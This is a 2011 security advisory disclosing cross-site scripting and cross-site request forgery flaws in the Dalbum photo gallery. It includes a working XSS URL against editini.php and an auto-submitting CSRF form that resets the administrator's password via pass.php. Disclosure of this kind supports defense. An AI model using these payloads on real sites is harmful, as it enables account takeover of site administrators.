Multiple Vulnerabilities in Dalbum

2011-04-05T00:00:00
ID HTB22941
Type htbridge
Reporter High-Tech Bridge
Modified 2011-04-05T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Dalbum which could be exploited to perform cross-site scripting and cross-site request forgery attacks.

1) Cross-site scripting (XSS) vulnerability in Dalbum
The vulnerability exists due to input sanitation error in the "url" parameter in editini.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in user`s browser in context of the vulnerable website.
Exploitation example:
http://[host]/editini.php?album=/Sample%20album/&url=1%27%3E%3Cscript%3Ealer t%28%22XSS%22%29;%3C/scr ipt%3E

2) Cross-site request forgery (CSRF) vulnerability in Dalbum
The vulnerability exists due to insufficient validation of the request origin in pass.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and change administrator`s credentials.
Exploitation example:
<form action="http://[host]/pass.php" method="post" name="main" />
<input name="user" value="1" type="hidden" />
<input name="pass" value="1" type="hidden" />
<input name="passc" value="1" type="hidden" />
<input type="hidden" name="action" value="add">
<input type="submit" id="btn" name="submit" value="Submit ››">
</form>
<script>
document.getElementById('btn').click();
</scri pt>